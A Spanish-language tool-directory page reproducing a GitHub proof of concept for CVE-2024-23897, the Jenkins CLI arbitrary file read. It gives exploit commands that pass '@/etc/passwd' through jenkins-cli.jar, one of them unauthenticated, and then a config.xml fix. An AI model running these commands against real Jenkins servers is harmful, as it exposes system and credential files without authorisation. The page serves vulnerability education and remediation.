Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
PoC-Fix-jenkins-rce_CVE-2024-23897 — en este git puedes encontrar toda la información sobre el CVE-2024-23897 | Kitploit
Herramientas/GitHubGitHub/10t4/poc-fix-jenkins-rce_cve-2024-23897
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHub10t4/poc-fix-jenkins-rce_cve-2024-23897

PoC-Fix-jenkins-rce_CVE-2024-23897

en este git puedes encontrar toda la información sobre el CVE-2024-23897

Ver Repositorio
42hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC-jenkins-rce_CVE-2024-23897.

En este git puedes encontrar toda la información sobre la CVE-2024-23897.

logo-jenkins

Introducción

El problema, asignado con el identificador CVE-2024-23897, ha sido descrito como una vulnerabilidad de lectura arbitraria de archivos a través de la interfaz de línea de comandos integrada. Este analizador de comandos tiene una característica que reemplaza un carácter @ seguido de una ruta de archivo en un argumento con el contenido del archivo (expandAtFiles). Esta característica está habilitada por defecto y Jenkins 2.441 y anteriores, LTS 2.426.2 y anteriores no la deshabilitan.

PoC

Para este PoC, he instalado Jenkins 2.426.2 con Docker para probar el exploit de la vulnerabilidad

root@kitploit:~
docker run -p 8080:8080 -p 50000:50000 -v jenkins_home:/var/jenkins_home jenkins/jenkins:2.426.2

Después de crear un usuario y una contraseña, descargué el cliente CLI de Jenkins (jenkins-cli.jar) en mi máquina atacante.

screen1
y añadir la línea:

Luego, escribí el comando para el exploit. En este comando, necesitamos tener las credenciales del usuario de Jenkins.

root@kitploit:~
java -jar jenkins-cli.jar -s http://192.168.1.45:8080/ -auth "user:aze+123" connect-node "@/etc/passwd"
screen2

Otro comando permite mostrar las primeras líneas de un archivo sin autenticación.

root@kitploit:~
java -jar jenkins-cli.jar -noCertificateCheck -s 'http://192.168.1.45:8080' help "@/etc/passwd"
screen3

Solucionar la vulnerabilidad

Para contrarrestar esta vulnerabilidad, debes navegar al archivo de configuración de Jenkins llamado config.xml (en mi caso, se encuentra en mi contenedor Docker, así que cambio al modo shell en mi contenedor)

screen4
root@kitploit:~
<expandAtFiles>false</expandAtFiles>

y reiniciar Jenkins :

root@kitploit:~
service jenkins restart
Descargar herramienta